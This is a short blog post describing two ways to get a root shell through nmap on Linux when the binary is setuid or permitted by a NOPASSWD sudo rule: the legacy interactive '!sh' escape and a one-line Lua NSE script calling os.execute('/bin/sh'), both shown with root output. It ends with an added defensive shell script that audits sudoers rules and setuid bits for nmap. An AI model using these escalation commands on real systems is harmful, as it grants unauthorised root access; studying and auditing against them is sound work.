Day 64: NMAP 2 ROOT FTW (with and without interactive mode)

Today's post is short but sweet. You may have seen people using nmap to escalate privileges on Linux. This works when the nmap binary has the SETUID bit set, or when a sudo rule lets you run it with NOPASSWD. It usually goes a little something like this…

nmap --interactive OR sudo nmap --interactive
nmap> !sh
# id
uid=0(root) gid=0(root) groups=0(root)

This was fun for a long time, and even better when CTFs use it, as you can fly through with the good ol’ nmap trick. But what about newer versions, where interactive mode is not present? Do not fear, an nmap script is here and ready to save the day.

echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

Since NSE scripts are written in Lua, get creative! Endless possibilities.
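
To check a host for the two conditions described above (a setuid nmap binary, or a sudoers rule that lets a user run nmap as root), here is an added example that is not part of the original post. The function names and the sample sudoers lines are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit for the two conditions the post relies on.
# All function names and the sample sudoers lines are constructed.

# Constructed sudoers-style input so the script runs offline.
sample_sudoers() {
    cat <<'EOF'
# constructed sample, not from a real host
root    ALL=(ALL:ALL) ALL
scanner ALL=(root) NOPASSWD: /usr/bin/nmap
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
netops  ALL=(root) /usr/bin/tcpdump, /usr/local/bin/nmap
# alice ALL=(root) NOPASSWD: /usr/bin/nmap
EOF
}

# Read sudoers-style lines on stdin; print rules that name an nmap binary.
# Comments are stripped first. Blanket "ALL" command grants also cover nmap
# but are not flagged here.
flag_sudo_nmap() {
    sed 's/#.*//' | grep -E '(^|[[:space:],:/])nmap([[:space:],]|$)' || true
}

# Print regular files named nmap with the setuid bit under the given dirs.
find_setuid_nmap() {
    find "$@" -type f -name nmap -perm -4000 2>/dev/null || true
}

echo "sudoers rules that grant nmap (constructed sample):"
sample_sudoers | flag_sudo_nmap
echo "setuid nmap binaries under /usr/bin and /usr/local/bin:"
find_setuid_nmap /usr/bin /usr/local/bin
```

On a real host, run it as root against the actual policy, for example `cat /etc/sudoers /etc/sudoers.d/* | flag_sudo_nmap`, and remove the setuid bit or the sudo rule for anything it reports.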